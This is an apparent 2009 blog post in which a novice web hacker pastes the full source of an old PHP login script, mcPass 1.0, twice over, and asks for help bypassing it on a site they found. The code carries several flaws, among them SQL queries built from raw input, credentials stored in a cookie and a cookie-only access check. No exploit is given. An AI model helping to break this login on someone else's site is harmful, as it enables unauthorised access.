Php Login Form Bypassing, A login form I need to bypass
Monday, March 9, 2009 maopz tutorials 0 commentsHello,
I'm pretty new to web hacking (it's been a month or so), but I already know the basics,
and I've been web designing for about a year, so i know what i'm talking about
I've recently found a login script on a site, and I was just getting interested in ho to bypass it
I looked up a bit and found the source code, it looks like this:
CODE
<?
// mcPass 1.0 - copyright 2002 Marc Cagninacci - marc@phpforums.net -
http://www.phpforums.net
// Configuration MySQL - Set this
$host="localhost";
$login="root";
$pass="";
$base="mcpass";
// Language - Set this
$lErrLog= "Nom Incorrect"; // "Wrong Login";
$lErrPass= "Mot de Passe Incorrect"; // "Wrong Password";
$lLogin= "Nom"; // "Login";
$lPass= "Mot de Passe"; // "Password";
$lValider= "Valider"; // "Submit";
/*
------------------------------------------------------------------------
--------------
- Envoyez ce fichier mcPass.php а la RACINE de votre site
Upload this file mcPass.php in the ROOT of your site
- Copiez les quatre lignes suivantes tout en haut de chaque page que
vous voulez protйger:
Paste the four lines below at the very top of each page you want to
protect:
------------------------------------------------------------------------
-----------------
------------------------------------------------------------------------
-----------------
<?
$ok = explode(":",$HTTP_COOKIE_VARS["mcPass"]);
if(empty($ok[0])){ header
("location:http://$HTTP_HOST/mcPass.php?go=$PHP_SELF"); }
?>
------------------------------------------------------------------------
-----------------
------------------------------------------------------------------------
-----------------
- Naviguez jusqu'а http://www.votresite.com/mcPass.php et saisissez un
nom et un mot de passe.
Go to http://www.yoursite.com/mcPass.php and choose a login and a
password
------------------------------------------------------------------------
-----------------
----------Ne rien modifier en dessous - Don't modify anything below
---------------------
------------------------------------------------------------------------
---------------*/
if(!$go)
{
$connect= mysql_connect($host,$login,$pass);
mysql_select_db($base, $connect);
$result = mysql_list_tables ($base);
$i = 0;
while ($i < mysql_num_rows($result)) {
$tb_names[$i] = mysql_tablename ($result, $i);
if ($tb_names[$i]=="mcpass_tbl") $table=1;
$i++;
}
if ($table==1)
{
$install= 'Running';
}
}
if((isset($SubInst))&&($b==md5($base)))
{
$connect= mysql_connect($host,$login,$pass);
mysql_select_db($base, $connect);
$query="DROP TABLE IF EXISTS mcpass_tbl;";
mysql_query($query);
$query="CREATE TABLE mcpass_tbl (
user varchar(20) NOT NULL default '',
pwd varchar(20) NOT NULL default '',
KEY user (user)
) TYPE=MyISAM;";
mysql_query($query);
$query="insert into mcpass_tbl values('$user', '$pwd')";
mysql_query($query, $connect);
$query="select * from mcpass_tbl";
$res=mysql_query($query);
$aff=mysql_fetch_array($res);
}
function mcPassCookie ($user,$pwd)
{
SetCookie("mcPass", "$user:$pwd");
}
if(isset($submit))
{
$connect= mysql_connect($host,$login,$pass);
mysql_select_db($base, $connect);
$query="select * from mcpass_tbl where user='$user'";
$res=mysql_query($query);
$verif=mysql_fetch_array($res);
if($pwd==$verif[pwd] && mysql_num_rows($res)!=0)
{
mcPassCookie($user,$pwd);
?>
<script TYPE="text/javascript" LANGUAGE="JavaScript">
document.location.replace("<? echo $go.''; ?>");
</script>
<?
}
elseif (mysql_num_rows($res)==0) $Err1=$lErrLog;
else $Err2=$lErrPass;
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>mcPass</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Expires" CONTENT="Fri, Jan 01 1900 00:00:00 GMT">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<style type="text/css">
a:actif { font-family: Verdana; color: black; text-decoration: none}
a:link { font-family: Verdana; color: black; text-decoration: none}
a:visited { font-family: Verdana; color: black; text-decoration: none}
a:hover { font-family: Verdana; color: white; text-decoration: none}
-
</style>
</head>
<body bgcolor="#C0C0C0" text="black">
<p align="right"><font face="verdana" size="5" color="black">
<a href="http://www.phpforums.net/index.php?dir=dld"
target="_blank">mcPass</a>
<?
if((!$go)&&(!$install)) echo ' - Set Up';
if ((!$go)&&(isset($install)))
{
echo ' is running.</font></p><hr>';
echo '<p align="right"><a
href=".$HTTP_HOST."><b>OK</b></a></p>';
echo '</body></html>';
exit();
}
?>
</font>
</p><hr>
<form action="mcPass.php" method="get">
<table align="right">
<tr>
<td align="right"><font face="Verdana, Arial, Helvetica,
sans-serif" size="2"><b>
<?
if(isset($Err1))
{
echo '<font color="red" size="2" face="verdana"><b>'.$Err1.'!
</b></font>';
}
echo $lLogin;
?>
: </b></font>
</td>
<td>
<?
if (isset($aff[0])) echo '<font color="red" size="2"
face="verdana"><b>'.$aff[0].'</b></font>';
else echo '<input type="text" name="user" value="'.$user.'">';
?>
</td>
</tr>
<tr>
<td align="right"><font face="Verdana, Arial, Helvetica,
sans-serif" size="2"><b>
<?
if(isset($Err2))
{
echo '<font color="red" size="2" face="Verdana"><b>'.$Err2.'!
</b></font>';
}
echo $lPass;
?>
:</b></font>
</td>
<td>
<?
if (isset($aff[1])) echo '<font color="red" size="2"
face="verdana"><b>'.$aff[1].'</b></font>';
else echo '<input type="password" name="pwd">';
?>
</td>
</tr>
<tr>
<td>
</td>
<td>
<?
if((!$go)&&(!$SubInst))
{
echo '<input type="submit" name="SubInst"
value="'.$lValider.'">';
echo '<input type="hidden" name="b" value="'.md5($base).'">';
}
elseif(isset($SubInst)) echo '<a
href=".$HTTP_HOST."><b>OK</b></a>';
else
{
echo '<input type="submit" name="submit"
value="'.$lValider.'">';
echo '<input type="hidden" name="go" value="'.$go.'">';
}
?>
</td>
</tr>
</table>
</form>
<br><br><br><br><br><br>
<br><br><br><br><br><br>
<p align="center">
<a href="http://validator.w3.org/check/referer"><img border="0"
src="http://www.w3.org/Icons/valid-html401"
alt="Valid HTML 4.01!" height="31" width="88"></a>
</p>
</body>
</html>
// mcPass 1.0 - copyright 2002 Marc Cagninacci - marc@phpforums.net -
http://www.phpforums.net
// Configuration MySQL - Set this
$host="localhost";
$login="root";
$pass="";
$base="mcpass";
// Language - Set this
$lErrLog= "Nom Incorrect"; // "Wrong Login";
$lErrPass= "Mot de Passe Incorrect"; // "Wrong Password";
$lLogin= "Nom"; // "Login";
$lPass= "Mot de Passe"; // "Password";
$lValider= "Valider"; // "Submit";
/*
------------------------------------------------------------------------
--------------
- Envoyez ce fichier mcPass.php а la RACINE de votre site
Upload this file mcPass.php in the ROOT of your site
- Copiez les quatre lignes suivantes tout en haut de chaque page que
vous voulez protйger:
Paste the four lines below at the very top of each page you want to
protect:
------------------------------------------------------------------------
-----------------
------------------------------------------------------------------------
-----------------
<?
$ok = explode(":",$HTTP_COOKIE_VARS["mcPass"]);
if(empty($ok[0])){ header
("location:http://$HTTP_HOST/mcPass.php?go=$PHP_SELF"); }
?>
------------------------------------------------------------------------
-----------------
------------------------------------------------------------------------
-----------------
- Naviguez jusqu'а http://www.votresite.com/mcPass.php et saisissez un
nom et un mot de passe.
Go to http://www.yoursite.com/mcPass.php and choose a login and a
password
------------------------------------------------------------------------
-----------------
----------Ne rien modifier en dessous - Don't modify anything below
---------------------
------------------------------------------------------------------------
---------------*/
if(!$go)
{
$connect= mysql_connect($host,$login,$pass);
mysql_select_db($base, $connect);
$result = mysql_list_tables ($base);
$i = 0;
while ($i < mysql_num_rows($result)) {
$tb_names[$i] = mysql_tablename ($result, $i);
if ($tb_names[$i]=="mcpass_tbl") $table=1;
$i++;
}
if ($table==1)
{
$install= 'Running';
}
}
if((isset($SubInst))&&($b==md5($base)))
{
$connect= mysql_connect($host,$login,$pass);
mysql_select_db($base, $connect);
$query="DROP TABLE IF EXISTS mcpass_tbl;";
mysql_query($query);
$query="CREATE TABLE mcpass_tbl (
user varchar(20) NOT NULL default '',
pwd varchar(20) NOT NULL default '',
KEY user (user)
) TYPE=MyISAM;";
mysql_query($query);
$query="insert into mcpass_tbl values('$user', '$pwd')";
mysql_query($query, $connect);
$query="select * from mcpass_tbl";
$res=mysql_query($query);
$aff=mysql_fetch_array($res);
}
function mcPassCookie ($user,$pwd)
{
SetCookie("mcPass", "$user:$pwd");
}
if(isset($submit))
{
$connect= mysql_connect($host,$login,$pass);
mysql_select_db($base, $connect);
$query="select * from mcpass_tbl where user='$user'";
$res=mysql_query($query);
$verif=mysql_fetch_array($res);
if($pwd==$verif[pwd] && mysql_num_rows($res)!=0)
{
mcPassCookie($user,$pwd);
?>
<script TYPE="text/javascript" LANGUAGE="JavaScript">
document.location.replace("<? echo $go.''; ?>");
</script>
<?
}
elseif (mysql_num_rows($res)==0) $Err1=$lErrLog;
else $Err2=$lErrPass;
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>mcPass</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Expires" CONTENT="Fri, Jan 01 1900 00:00:00 GMT">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<style type="text/css">
a:actif { font-family: Verdana; color: black; text-decoration: none}
a:link { font-family: Verdana; color: black; text-decoration: none}
a:visited { font-family: Verdana; color: black; text-decoration: none}
a:hover { font-family: Verdana; color: white; text-decoration: none}
-
</style>
</head>
<body bgcolor="#C0C0C0" text="black">
<p align="right"><font face="verdana" size="5" color="black">
<a href="http://www.phpforums.net/index.php?dir=dld"
target="_blank">mcPass</a>
<?
if((!$go)&&(!$install)) echo ' - Set Up';
if ((!$go)&&(isset($install)))
{
echo ' is running.</font></p><hr>';
echo '<p align="right"><a
href=".$HTTP_HOST."><b>OK</b></a></p>';
echo '</body></html>';
exit();
}
?>
</font>
</p><hr>
<form action="mcPass.php" method="get">
<table align="right">
<tr>
<td align="right"><font face="Verdana, Arial, Helvetica,
sans-serif" size="2"><b>
<?
if(isset($Err1))
{
echo '<font color="red" size="2" face="verdana"><b>'.$Err1.'!
</b></font>';
}
echo $lLogin;
?>
: </b></font>
</td>
<td>
<?
if (isset($aff[0])) echo '<font color="red" size="2"
face="verdana"><b>'.$aff[0].'</b></font>';
else echo '<input type="text" name="user" value="'.$user.'">';
?>
</td>
</tr>
<tr>
<td align="right"><font face="Verdana, Arial, Helvetica,
sans-serif" size="2"><b>
<?
if(isset($Err2))
{
echo '<font color="red" size="2" face="Verdana"><b>'.$Err2.'!
</b></font>';
}
echo $lPass;
?>
:</b></font>
</td>
<td>
<?
if (isset($aff[1])) echo '<font color="red" size="2"
face="verdana"><b>'.$aff[1].'</b></font>';
else echo '<input type="password" name="pwd">';
?>
</td>
</tr>
<tr>
<td>
</td>
<td>
<?
if((!$go)&&(!$SubInst))
{
echo '<input type="submit" name="SubInst"
value="'.$lValider.'">';
echo '<input type="hidden" name="b" value="'.md5($base).'">';
}
elseif(isset($SubInst)) echo '<a
href=".$HTTP_HOST."><b>OK</b></a>';
else
{
echo '<input type="submit" name="submit"
value="'.$lValider.'">';
echo '<input type="hidden" name="go" value="'.$go.'">';
}
?>
</td>
</tr>
</table>
</form>
<br><br><br><br><br><br>
<br><br><br><br><br><br>
<p align="center">
<a href="http://validator.w3.org/check/referer"><img border="0"
src="http://www.w3.org/Icons/valid-html401"
alt="Valid HTML 4.01!" height="31" width="88"></a>
</p>
</body>
</html>
I see that the code is a bit outdated, but I'm still not that good to find out vulnerabilities in this code.
Any help would be appreciated =)
Regards
0 comments: to “ Php Login Form Bypassing, A login form I need to bypass ” so far...
Post a Comment